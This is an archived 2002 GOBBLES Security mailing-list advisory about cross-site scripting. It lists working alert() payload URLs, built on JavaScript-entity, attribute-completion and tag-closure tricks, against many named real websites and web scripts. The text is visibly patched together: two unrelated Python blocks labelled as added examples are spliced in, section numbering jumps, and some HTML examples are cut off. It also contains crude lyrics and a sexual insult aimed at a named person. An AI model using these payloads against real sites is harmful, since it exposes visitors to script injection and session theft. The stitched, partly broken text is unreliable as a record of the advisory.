From: gobbles@hushmail.com
Sent: Monday, May 06, 2002 9:35 AM
To: bugtraq@securityfocus.com
Cc: vulnwatch@vulnwatch.org
Subject: [VulnWatch] ALERT! MAJOR SITES/PRODUCTS VULNERABLE TO *NEW* CSS ATTACK ALERT!
Hi,
We saw the Administrivia post today, so we decided to send this in. Hopefully it's not too late.
The post mentioned that new forms of cross-site scripting attacks would be accepted. Well, as you'll see, we have some nifty tricks that are discussed, and also some major products are totally torn apart.
Most of the sites allow you to download their custom scripts (e.g. man.cgi) so we believe we are justified in giving examples of sites that are affected, especially since this has been the norm on the security lists for a while now.
Thanks to all the administrators who were good sports over this.
GOBBLES SECURITY
http://www.bugtraq.org/
GOBBLES@hushmail.com
GOBBLES SECURITY ADVISORY #33
Compass, Square, and Slide-rule
New Generation CSS
ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT!
############################################################################
# #
# CROSS-SITE SCRIPTING VULNERABILITIES IN PROMINENT WEBSITES AND PRODUCTS #
# #
# #
############################################################################
ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT!
I'm over it
You see I'm falling in the fast abyss
Clouded by memories of the past
At last I see
I hear it fading, I can't speak it
Oh yes you will dig my grave
You feeling, finding, always whining
Take my hand now be alive
You see I cannot be forsaken
Because I'm not the only one
We walk amongst you feeding, raping
Must we hide from everyone?
Before we begin, we'd like to mention that recently we've been overwhelmed
with emails from journalists asking us questions about our security group.
GOBBLES like this very much because it is sign of his crew becoming very
famous and ubiquitous. We be accused of seeking fame and job offers. To this
GOBBLES say no, we not after job offers, but yes, we after as much fame and
attention as possible and this is why we will be disclosing more serious
remote vulnerabilities in OS like Solaris and IRIX in near future. Remote
exploit for IRIX can then be complemented with upcoming GOBBLES IRIX
backdoor.
Current misinterpretation about what GOBBLES mean when he say he group
seeking worldwide fame, mostly stem from belief that GOBBLES is supporter of
non-disclosure and is being sarcastic. This is wrong, disclosure of
rpc.rwalld hole show GOBBLES not supporter of non-disclosure and current
development project 'lestat' for another default RPC service in Solaris is
leading to further proof that GOBBLES is avid supporter of full-disclosure,
especially because it great way to annoy as many Fascists, Communists, and
McCarthys as possible ;PPPPPPPPPPP. But GOBBLES primary motivation is
becoming as famous as possible.
We now co-existing with Bugtraq, making the peace, being ethical, etc. For
those interested in learning more about the hacker ethics of GOBBLES
Security, please see the comprehensive articles written by RLoxley on the
subject. He is a very fine man and, just as every crowd needs its pogo stick
expert, he has selected ethics as his niche. And what a great job he has
done. GOBBLES recommend having a look at #hackphreak on undernet where you
can share hacking tips with fellow hackers, bask in the presence of GPL
hippies, and just meet up with all those elite dudes who have spiffy HTML on
their websites.
BACKGROUND
==========
Been a lot of fanfare about cross-site scripting in recent times. Person
suggest changing acronym from CSS to XSS so it different from Cascading
Style Sheets, but this not really good move because XSS conflict with XML
Security Suite from IBM (they company who make computer systems, probably
not big fans of stem cell research HEHEHEHEHEHEHEHE).
When GOBBLES Security first dreamed of the CSS technique, pioneered it,
refined it, and perfected it, we knew of the dastardly tool of mass
destruction that had just materialized. Here was something that could make
Joe Average a security expert, something that could be wielded by the little
guy to sting and subdue the domineering commercial bullies. A well-planted
CSS attack can undermine the reputation of even the most stringent
corporations, thus making it one of the most effective political tools known
in cyberspace. It truly is the Queen's Gambit, the Power Set, the Homology
Group, and the Achilles Heel of the infosec world.
See the recent CSS attack on Steve-do-me-raw-Gibson's grc.com as witnessed
on Bugtraq for an example of the effective political power this technique
possesses.
The cross-site scripting attack is the hallmark of the Vuln-Dev mailing
list. We understand that a screen local and an rpc.rwalld remote are pale in
comparison to the cross-site scripting attack, which is why we don't carry
any grudges against The Blue Boar for moderating us.
INNOVATIVE CSS TECHNIQUES
=========================
* JavaScript entities
---------------------
Only hotmail security historians like those at GOBBLES Security know of
obscure feature in JavaScript language that make it easy to bypass thing
like "<...>", "", and "javascript:" filter for CSS
attack using JavaScript. That is thing called JavaScript entity. Like...
&{alert('GOBBLES')};
When url-encoded become...
%26%7balert%28%27GOBBLES%27%29%7d%3b
The beauty of this technique for the adorned CSS exploiter is that the
GOBBLES CSS JavaScript Entity can appear almost anywhere with good results.
Note that "CERT" page below make no mention of this at all and even say that
ampersand is not relied upon by current exploits. Well, now it is.
http://www.cert.org/tech_tips/malicious_code_mitigation.html
For reference, HTML4 specification only require you to encode the following:
; %3b
/ %2f
? %3f
: %3a
@ %40
= %3d
& %26
< %3c
> %3e
" %22
# %23
% %25
{ %7b
} %7d
| %7c
\ %5c
^ %5e
~ %7e
[ %5b
] %5d
` %60
Until now, that encoding information was private knowledge of the
underground. GOBBLES is about information dissemination and believe
information wants to be free, though. So really GOBBLES see no need why he
should have to justify the disclosure of the encoding techniques. If GOBBLES
didn't do it, someone would have, and it best this come from a whitehat
retard than from someone making the big dollar.
Sometimes in URLs below we can't encode parameter, but this no problem for
GOBBLES because smart thing to do is just not enter the character encoded,
i.e. enter it literally with no %XX, e.g. '>' gets entered as '>', i.e. '>'
does not get entered as '%3e'. Why? Because sometimes in URLs below we can't
encode parameter.
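An added example, not part of the advisory, of the defender-side check a web administrator would want for the requests described above: it scans access-log lines for the JavaScript entity whether it arrives literally, %XX-encoded or double-encoded, and for the HTML-closure and event-handler shapes. The log lines, addresses and function names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Common Log Format); payload shapes mirror the advisory, hosts/paths/IPs are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [06/May/2002:09:35:00 +0000] "GET /search/exploits.asp?keyword=&{alert('GOBBLES')}; HTTP/1.0" 200 512
10.0.0.6 - - [06/May/2002:09:36:10 +0000] "GET /cgi-bin/cvsweb.cgi/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e HTTP/1.0" 200 1024
10.0.0.7 - - [06/May/2002:09:37:20 +0000] "GET /cgi-bin/nfrsearch?query=hehehe&id=2&whole=hello HTTP/1.0" 200 2048
10.0.0.8 - - [06/May/2002:09:38:30 +0000] "GET /index.php?redirect=%2526%257balert%2528%25271%2527%2529%257d%253b HTTP/1.0" 302 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')
# Matched against the *decoded* URL: a JavaScript entity "&{...};", a tag or
# closing tag (HTML closure), and a quote followed by an on<event>= attribute.
PATTERNS = {
    "js_entity": re.compile(r"&\{.*?\};?", re.S),
    "html_closure": re.compile(r"</|<[a-z]+\b", re.I),
    "event_handler": re.compile(r"['\"]\s*on[a-z]+\s*=", re.I),
}

def normalize(url, max_rounds=3):
    """Percent-decode repeatedly (bounded) so literal, %XX-encoded and
    double-encoded payloads, and '+' spaces, are compared in one form."""
    for _ in range(max_rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url

def inspect_request(url):
    decoded = normalize(url)
    return {name for name, rx in PATTERNS.items() if rx.search(decoded)}

def scan_log(text):
    """Return (client_ip, decoded_url, sorted findings) for suspicious lines."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = inspect_request(m.group(1))
        if findings:
            hits.append((line.split()[0], normalize(m.group(1)), sorted(findings)))
    return hits

if __name__ == "__main__":
    for ip, url, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, url)
```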
* HTML string completion / HTML closure
---------------------------------------
Principles are basically identical to SQL injection technique. Doesn't need
much coverage since it pretty obvious to anyone with rational mind. GOBBLES
will let "CERT" write a dissertation on it. Essentially...
*** HTML string completion:
Make $user_provided: " attribute="malicious_data
Then original text becomes
Good to make 'attribute' event handlers like onMouseOver, onLoad, onClick,
etc. But can just use common attribute like 'id' and just insert GOBBLES CSS
JavaScript Entity.
*** HTML closure:
Make $user_provided: ">
Then original text becomes
">
Good way to introduce /
OR
http://thttpd-site/cgi-bin/ssi//
Note that it doesn't decode url-encoding, you may have mixed results using
spacing in the URL, and the default /
http://www.happyhacker.org/cgi-bin/ssi/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
Both were tested against the latest stable version of thttpd from...
http://www.acme.com/software/thttpd/thttpd-2.20c.tar.gz
... so this time the developer can't downplay the findings of the GOBBLES
Security Research Organization like he did with our theoretically
exploitable off-by-one, nor can he invent fake CHANGELOG entries (google
cache catch you out there my friend).
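An added example, not from the advisory, that puts the three tricks above side by side from the fixing end: the entity, attribute-completion and HTML-closure inputs are interpolated into an href attribute first through a tag-stripping filter of the kind the text says is bypassed, then through attribute-context output encoding, and a parser-based check reports which rendering kept the attribute intact. Sample values and function names are invented for the example.

```python
import re
import html
from html.parser import HTMLParser

# Constructed inputs covering the three tricks the advisory describes:
# JavaScript entity, attribute ("string") completion and HTML closure.
SAMPLES = {
    "entity": "&{alert('GOBBLES')};",
    "completion": "\" onMouseOver=\"&{alert('GOBBLES')};",
    "closure": "\"><p align=&{alert('GOBBLES')};>",
}

def naive_filter(value):
    """The kind of filter the advisory bypasses: strips <...> tags and the
    javascript: scheme but leaves '&', '{' and '"' untouched."""
    value = re.sub(r"<[^>]*>", "", value)
    return re.sub(r"javascript:", "", value, flags=re.I)

def render_naive(value):
    # Interpolates filtered data straight into an attribute, as the
    # guestbook-style CGI code does: <a href="...">
    return '<a href="%s">link</a>' % naive_filter(value)

def render_safe(value):
    # Attribute-context output encoding: '&' -> '&amp;' so '&{' can never be
    # read as an entity, and '"' / "'" -> references so the attribute cannot end.
    return '<a href="%s">link</a>' % html.escape(value, quote=True)

class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags, self.text = [], ""
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))
    def handle_data(self, data):
        self.text += data

def output_is_safe(markup, original):
    """True only if the markup still parses as exactly one <a> whose href is
    the user's text (nothing broke out) and no raw JavaScript entity survives."""
    p = _Collector()
    p.feed(markup)
    p.close()
    return "&{" not in markup and p.tags == [("a", [("href", original)])] and p.text == "link"

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:11} naive={output_is_safe(render_naive(value), value)} "
              f"safe={output_is_safe(render_safe(value), value)}")
```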
3. thievco.com / Matt Wright's guestbook script
-----------------------------------------------
Hehehehehehehehe, GOBBLES to this day still don't know what is funnier:
GOBBLES writing advisory on local filesystem feature of lynx in awhttpd
advisory, or The Blue Boar allowing it to pass unhindered to Vuln-Dev. Of
course, nowadays, The Blue Boar refuses to allow any of our advisories
through, since it's probably easier to err on the side of caution when you
can't read C code ;).
GOBBLES regularly visit The Blue Boar's website in search of hacking
information, so it incumbent upon GOBBLES to alert world to presence of
cross-site scripting hole in The Blue Boar's website and, more importantly,
in Matt Wright's guestbook script.
Matt Wright's guestbook script can be found at:
http://worldwidemart.com/scripts/guestbook.shtml
To he credit, he has $allow_html variable that can strip "<...>" stuff, but
once again, GOBBLES trademarked JavaScript Entity CSS Technique come to the
rescue. Incidentally, The Blue Boar allows html in his guestbook fields, but
as we just said, the presence of this does not determine whether or not we
can use our CSS technique. We always can.
if ($FORM{'url'}) {
print GUEST "$FORM{'realname'}";
}
You see, even if html form do not have 'url' parameter, remote attacker can
still create their own local html form pointing at The Blue Boar's website
or some other site with Matt Wright's guestbook script. This permits them to
inject malicious data via 'url' parameter that will allow CSS attacks on
anyone viewing the guestbook.
Script can only be called with POST method, so it can't be linked to, but
this is moot point because with permanent malicious CSS data in actual
guestbook, attacker can just drop it there and leave, knowing that if site
store authentication information in cookies or whatever, anyone viewing
guestbook with JavaScript enabled will be slain by malicious code in
attacker guestbook entry.
This is obviously a very devastating vulnerability. CSS hole are sometimes
overlooked, but luckily in this world there are security masterminds with a
razor sharp logic -- they miss nothing. These masterminds are your only
salvation. Without their marvellous creativity and insight, the Internet
would be a very scary place indeed.
Hereeeeeeeeeeeeeeeeeeeeeee's Johnnnnnnnnnnnnnnnnnnnnnnnnnyyyyyyyyyyyyyy!
4. antionline.com / fatelabs.com / vbulletin php package
--------------------------------------------------------
There are tons of bugs in the latest version of this package. It's
commercial, so you can only download a Lite version, but GOBBLES have a
network of contacts in the warez scene and was able to obtain both the
version 2.0.3 that Antionline is built on and the latest version.
Antionline switched from PERL to PHP last year. John Vranesevich can't code,
let alone write secure code, so he forced to experiment with external
scripts and such. Not a good selection he has made, because right now
GOBBLES have script that can ethically hack John Vranesevich's site in 5-10
seconds.
Only interested in CSS bugs here, though.
The bug is like vbulletin cross-site scripting hole revealed here:
http://online.securityfocus.com/archive/1/263609/2002-05-01/2002-05-07/0
But big difference is that GOBBLES CSS JavaScript Entity Technique and the
other techniques mentioned above make many, many, many more portions of the
code vulnerable.
Examples:
http://www.antionline.com/mod/index.php?redirect=&{alert('GOBBLES')};
http://forums.fatelabs.com/mod/index.php?redirect=&{alert('GOBBLES')};
Looking at HTML source show how GOBBLES CSS Javascript Entity can appear
anywhere in attribute value, which make it very flexible.
>>>>>. GOBBLES
know all the techniques: crazy monkey, sendmail, bind!
y0 st0p fuqn w1t k3v1n'z r1ghtz. h3 1z a hum4n b31ng U kn0. u b4st4rdz m4y
t4k3 aw4y h1z h4m r4d10 r1ghtz, but u w1ll n3v3r t4k3 aw4y h1z s3cur1tyf0cus
j0urn4l1zm r1ghtz, h1z t43 b0 r1ghtz, 0r h1z r1ght t0 w34r p1nk l1ng3r13
w1th a b4n4n4 up h1z chut3.
11. nessus.org / freebsd.org / cvsweb
-------------------------------------
http://cgi.nessus.org/cgi-bin/cvsweb.cgi/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
http://www.freebsd.org/cgi/cvsweb.cgi/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
Hehehe, and a Theo bonus:
http://www.openbsd.org/cgi-bin/cvsweb/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
12. owasp.org
-------------
http://owasp.org/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
These guys like to write all about web security, including cross-site
scripting attacks. You can read about it here:
http://www.owasp.org/asac/input_validation/css.shtml
13. whitehats.com
-----------------
http://www.whitehats.com/cgi/arachNIDS/Search?search=&{alert('GOBBLES')};
That just an example of dozens of CSS holes found on the whitehats website
in different scripts, including the forums. Hasn't been updated for a few
months because Max Vision serving prison sentence for ./NXT'ing nameservers.
When he get out we will send him email informing him of all the CSS and
command execution bugs GOBBLES found on his website. GOBBLES appreciate work
of Max Vision in the community; we make heavy use of his BIND9 fingerprint
techniques and he keep a great database of signatures for snort that let us
know when we've been owned.
14. ciac.org / nfr.com / webglimpse
-----------------------------------
From ciac:
http://www.ciac.org/cgi-bin/webglimpse/www/htdocs/ciac/archive?query=%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
http://hoaxbusters.ciac.org/cgi-bin/webglimpse-hoaxbusters/www/hoaxbusters/archive?query=%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
From nfr:
http://www.nfr.com/cgi-bin/nfrsearch?query=hehehe&id=2&whole=%26%7balert%28%27GOBBLES%27%29%7d%3b
15. cerias.purdue.edu
---------------------
http://www.cerias.purdue.edu/search/results.php?search=%3cp+align%3D%26%7balert%28document.location%29%7d%3b%3e
This script strip the single quotes, but any web puppy can get around this.
TEAM GOBBLES in a hurry to meet closing Bugtraq CSS deadline so we couldn't
check all scripts on this site, but because we fans of this site, we sent
administrator an email pointing out the problems and telling him where he
can find further information:
"pp. 544-547 of book _Practical Unix & Internet Security_ describe CGI
weakness in detail and you well-advised to purchase a copy of this book.
GOBBLES have this book on he shelf and wouldn't be what he is today if he
didn't read this amazing piece of literary accomplishment."
16. infowar.com
---------------
http://www.infowar.com/search/search_results.cfm?term1=
There also several remote command execution vuln on Winny site. He been
notified.
17. grc.com
-----------
http://grc.com/x/ne.dll?
Hehehe, hi Steve, you studmuffin hehehehehehe ;>
18. acm.org
-----------
http://campus.acm.org/public/search/results.cfm?query=%3C%2Ftextarea%3E%3Cp+align%3D%26%7Balert%28%27GOBBLES%27%29%7D%3B
This good example of HTML closure technique, i.e. using to break
out of one opened already and then busting cross-site scripting move in
regular fashion.
19. security.nnov.ru
--------------------
http://security.nnov.ru/search/exploits.asp?keyword=&{alert('GOBBLES')};
GOBBLES certain he found this one before 3APA[...]A hehehehehe ;).
20. sun.com
-----------
http://sunsolve.sun.com/pub-cgi/show.pl?target=%26%7balert%28%27GOBBLES%27%29%7d%3b
Hehehehehe, 2+ default RPC remote root vulns coming to Bugtraq *VERY* soon.
GOBBLES will be making the exploits very easy to use this time, because we
had a lot of emails concerning rpc.rwalld from HotBabe, LinuxGal, etc.
saying rpc.rwalld impossible to use.
FINAL WORDS
===========
We have ethically disclosed CSS holes in a number of sites by co-existing
with Bugtraq and spreading the full-disclosure faith. We have also shared a
few nuggets of information with the community we love. Because of the
relatively low risk of the attack -- to say the least -- GOBBLES didn't find
it necessary to inform all of the administrators. And in certain respects,
GOBBLES think it really makes little difference to the security of the above
sites anyway...
Remember: all of the above sites are UNSAFE TO VISIT from untrusted
websites, and some are even unsafe to visit directly with scripting enabled
in your browser.
There are many self-proclaimed CSS experts out there who will litter your
inbox with their daily CSS discoveries, but there can only be one CSS king,
and that king is GOBBLES. Don't accept any imitations.
Sleep well, my friends.